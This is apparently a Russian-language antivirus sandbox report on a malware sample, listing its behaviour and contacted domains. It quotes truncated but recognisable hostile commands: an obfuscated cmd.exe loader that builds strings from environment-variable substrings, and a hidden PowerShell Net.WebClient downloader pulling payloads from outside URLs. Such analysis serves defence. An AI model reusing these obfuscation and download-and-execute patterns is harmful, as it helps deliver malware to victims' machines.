Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set L3=}J~f\$RjHS\iVBPD1@72UGMp.xz(8mklgCa_st9E4 A)v3F-w%:65rcyLnqTuo{hdeNWI'+;b,O0=&&for %n in (23;61;48;49;14;20;13;56;68;33;50;2;52;73;16;49;5...
Сетевая активность
Подключается к
- 'sm##y.com':80
- 'tu###ecal.net':80
- 'tu###ecal.net':443
- 'au####rt.tomsk.ru':80
TCP
Другие
- 'tu###ecal.net':443
UDP
- DNS ASK sm##y.com
- DNS ASK tu###ecal.net
- DNS ASK ri#####ol-marketing.nl
- DNS ASK au####rt.tomsk.ru
- DNS ASK ra####startup.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set L3=}J~f\$RjHS\iVBPD1@72UGMp.xz(8mklgCa_st9E4 A)v3F-w%:65rcyLnqTuo{hdeNWI'+;b,O0=&&for %n in (23;61;48;49;14;20;13;56;68;33;50;2;52;73;16;49;5...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:ON/C"set L3=}J~f\$RjHS/iVBPD1@72UGMp.xz(8mklgCa_st9E4 A)v3F-w%:65rcyLnqTuo{hdeNWI'+;b,O0=&&for %n in (23;61;48;49;14;20;13;56;68;33;50;2;52;73;16;49;53;49;9;39;9;9;68;74;66;66;42;22;39;50;2;...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $rjavshj='wjdjm';$znpqwrk=new-object Net.WebClient;$rbatwzp='http://sm##y.com/5s1dhHR50we_vVlpARD@http://tuandecal.net/MJ1aW1L...
- '<SYSTEM32>\cmd.exe'
